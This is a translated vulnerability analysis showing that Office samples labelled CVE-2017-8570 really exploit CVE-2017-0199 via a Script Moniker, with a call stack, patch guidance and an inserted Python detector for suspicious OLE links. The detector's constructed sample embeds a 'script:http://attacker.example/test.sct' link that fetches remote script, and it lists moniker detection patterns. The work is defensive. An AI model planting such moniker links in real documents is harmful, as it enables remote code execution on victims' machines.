MYHACK58:62201788542
Mislabelled CVE-2017-8570 samples and the thinking behind them (vulnerability warning, 黑吧安全网 / myhack58)

2017-08-11 00:00:00
佚名 (Anonymous)
www.myhack58.com
CVSS3: 7.8 High, CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
  Attack Vector: LOCAL
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: REQUIRED
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH

CVSS2: 9.3 High, AV:N/AC:M/Au:N/C:C/I:C/A:C
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE

EPSS: 0.974 High (percentile 99.9%)

The so-called CVE-2017-8570 sample
Last week, 360 Skyeye Lab (天眼实验室) noticed that a foreign researcher had published CVE-2017-8570 exploit code on GitHub and then deleted it. Looking further, we found quite a few Office malware samples labelled as CVE-2017-8570, such as the following sample, which VirusTotal tags as CVE-2017-8570.
![VirusTotal listing of the sample, tagged CVE-2017-8570](/Article/UploadPic/2017-8/2017811192832900.png?www.myhack58.com)
After analysis, 360 Skyeye Lab found that the exploit code in these samples still uses the old CVE-2017-0199 rather than the new CVE-2017-8570. Our analysis follows, for peer reference.
First, look at the sample's ppt\slides\_rels\slide1.xml.rels file. Relationship rId3 is an OLE object that points to an external link; note the string "script:http//[server]/test.sct". The important part is the "script:" prefix: it tells us that the next step is to parse this display name with MkParseDisplayName, which resolves it to a Script Moniker.
![slide1.xml.rels with the rId3 OLE object pointing at the script: link](/Article/UploadPic/2017-8/2017811192833273.png?www.myhack58.com)
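The pattern described above (an external oleObject relationship in a .rels part whose Target is a moniker display name such as "script:...") can be triaged without opening the document in Office. The following Python script is an added example, not code from the article or from 360 Skyeye Lab: it walks every .rels part of an OOXML package and flags external relationships that carry a moniker prefix, a script payload extension, or an oleObject type. The "script:" prefix is the one the article names; the other prefixes and extensions, the helper names, and the sample package it builds (including the placeholder hostname attacker.example) are assumptions constructed here for illustration, not indicators from the article.

```python
"""Scan an OOXML (docx/pptx/xlsx) package for external OLE links that use a
moniker display name, the pattern behind the CVE-2017-0199-style samples
discussed above. Added example; not the article's or 360's own code."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# "script:" is the Script Moniker prefix named in the article. "mhtml:" and
# "file:" are assumptions: other display-name prefixes that also resolve to a
# moniker when an OLE link is bound.
MONIKER_PREFIXES = ("script:", "mhtml:", "file:")
# Payload extensions commonly served through such links (assumption).
PAYLOAD_EXTS = (".sct", ".hta", ".wsf", ".vbs", ".js")


def scan_rels(rels_xml, part_name):
    """Return a list of suspicious external relationships in one .rels part."""
    findings = []
    root = ET.fromstring(rels_xml)
    for rel in root.iter(REL_NS + "Relationship"):
        if rel.get("TargetMode", "Internal") != "External":
            continue  # internal parts reference package entries, not monikers
        target = rel.get("Target", "")
        rtype = rel.get("Type", "").rsplit("/", 1)[-1]  # e.g. "oleObject"
        lowered = target.lower()
        reasons = []
        if rtype == "oleObject":
            reasons.append("external OLE link")
        for prefix in MONIKER_PREFIXES:
            if lowered.startswith(prefix):
                reasons.append("moniker " + prefix)
        if lowered.split("?", 1)[0].endswith(PAYLOAD_EXTS):
            reasons.append("script payload extension")
        if reasons:
            findings.append({"part": part_name, "id": rel.get("Id"),
                             "type": rtype, "target": target,
                             "reasons": reasons})
    return findings


def scan_package(data):
    """Scan every .rels part of an OOXML package supplied as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".rels"):
                findings.extend(scan_rels(zf.read(name), name))
    return findings


def build_sample_pptx():
    """Constructed sample (not a real-world artifact): a minimal package whose
    slide1.xml.rels has an external OLE object bound to a script: moniker."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
        '<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="script:http://attacker.example/test.sct" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_package(build_sample_pptx()):
        print(f"{f['part']} {f['id']} ({f['type']}): {f['target']} "
              f"-> {', '.join(f['reasons'])}")
```

Run it against a real file with scan_package(open(path, "rb").read()). An external oleObject relationship is not malicious on its own (legitimate linked objects exist), so the finding should be read as "bind this link only in an isolated environment", which is also the signal to check whether the host has both halves of the CVE-2017-0199 patch discussed below.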
And the Script Moniker is exactly one of the two monikers that Microsoft's April patch disabled:
![Script Moniker CLSID among the objects disabled by the April 2017 patch](/Article/UploadPic/2017-8/2017811192833131.png?www.myhack58.com)
In April 2017, the fix for CVE-2017-0199 disabled the htafile object and the script object:

| Disabled CLSID | ProgID | CVE |
|---|---|---|
| {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} | htafile | CVE-2017-0199 |
| {06290BD3-48AA-11D2-8432-006008C3FBFC} | script | CVE-2017-0199 |
The following call stack shows the sample's execution on a machine that does not have the CVE-2017-0199 patch:
0:000> k
ChildEBP RetAddr
003c2ea4 6c49d2f5 kernel32!CreateProcessW
003c2f2c 6c49d5f7 wshom!CWshShell::CreateShortcut+0x161
003c2f8c 75753e75 wshom!CWshShell::Exec+0x19a
003c2fac 75753cef OLEAUT32!DispCallFunc+0x165
003c303c 6c4a0267 OLEAUT32!CTypeInfo2::Invoke+0x23f
003c306c 6c4967d5 wshom!CDispatch::Invoke+0x5c
003c3098 7005dc18 wshom!CWshEnvRegistry::Invoke+0x29
003c30d8 7005db6c jscript!IDispatchInvoke2+0xf0
003c3114 7005dadf jscript!IDispatchInvoke+0x6a
003c31d4 7005dc6a jscript!InvokeDispatch+0xa9
003c3200 7005d9a8 jscript!VAR::InvokeByName+0x93
003c324c 7005da4f jscript!VAR::InvokeDispName+0x7d
003c3278 7005e4c7 jscript!VAR::InvokeByDispID+0xce
003c3414 70055d7d jscript!CScriptRuntime::Run+0x2b80
003c34fc 70055cdb jscript!ScrFncObj::CallWithFrameOnStack+0xce
003c3544 70055ef1 jscript!ScrFncObj::Call+0x8d
003c35c0 7005620a jscript!CSession::Execute+0x15f
003c360c 70050399 jscript!COleScript::ExecutePendingScripts+0x1bd
003c362c 7301831f jscript!COleScript::SetScriptState+0x98
003c363c 73018464 tongfang!ScriptEngine::Activate+0x1a
003c3654 730199d3 tongfang!ComScriptlet::Inner::StartEngines+0x6e
003c36a4 7301986e tongfang!ComScriptlet::Inner::Init+0x156
003c36b4 7301980b tongfang!ComScriptlet::New+0x3f
003c36d4 730197d0 tongfang!ComScriptletConstructor::CreateScriptletFromNode+0x26
003c36f4 730237e2 tongfang!ComScriptletConstructor::Create+0x4c
003c3714 73024545 tongfang!ComScriptletFactory::CreateScriptlet+0x1b
003c3734 76fcc6fd tongfang!ComScriptletMoniker::BindToObject+0x4d
003c3760 7708440c ole32!BindMoniker+0x64
003c37e8 770c5c07 ole32!wCreateLinkEx+0x9f
003c3848 770c6137 ole32!OleCreateLinkEx+0xaa
003c3884 713a2f10 ole32!OleCreateLink+0x42
WARNING: Stack unwind information not available. Following frames may be wrong.
003c59c4 7124e908 ppcore!DllGetLCID+0x2b3090
003c6a60 710928e4 ppcore!DllGetLCID+0x15ea88
003c6a90 714adb02 ppcore!PPMain+0x2cf6c
Read from the bottom up, the stack shows PowerPoint (ppcore) calling ole32!OleCreateLink for the external link, ole32!BindMoniker binding the script moniker (ComScriptletMoniker::BindToObject), the scriptlet's JScript engine running, and the script calling WScript.Shell.Exec, which ends in kernel32!CreateProcessW. The sample is therefore just another way of exploiting CVE-2017-0199, by inserting an htafile or script object, and not CVE-2017-8570.
CVE-2017-0199 patch trap
The so-called CVE-2017-8570 sample above is in fact CVE-2017-0199, yet on a machine we believed had the CVE-2017-0199 patch installed, the vulnerability could still be triggered. On deeper analysis we found that the patch had not been fully applied.
The CVE-2017-0199 patch Microsoft released in April is split into two parts: an Office patch (which mainly modifies MSO.dll) and a Windows patch (which mainly modifies ole32.dll). Both must be installed before a machine can be considered unaffected by CVE-2017-0199.
![Installed updates: the Office patch and the Windows system patch for CVE-2017-0199](/Article/UploadPic/2017-8/2017811192833796.png?www.myhack58.com)
In the screenshot, the red box marks the Office patch and the blue box the Windows system patch.
The Windows system patch generally installs normally, but whether the Office patch can be installed depends on the installed Office version. The Office versions listed in Microsoft's security advisory for the April patch are:
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Note that the patch Microsoft provides is tied tightly to a major Office version plus service pack. For example, Microsoft offers a patch for Microsoft Office 2013 Service Pack 1, but on earlier Office 2013 builds the CVE-2017-0199 MSO patch will not install; you must first upgrade to SP1. Moreover, any Office version not in the list above cannot be patched normally and remains affected by CVE-2017-0199. Examples follow.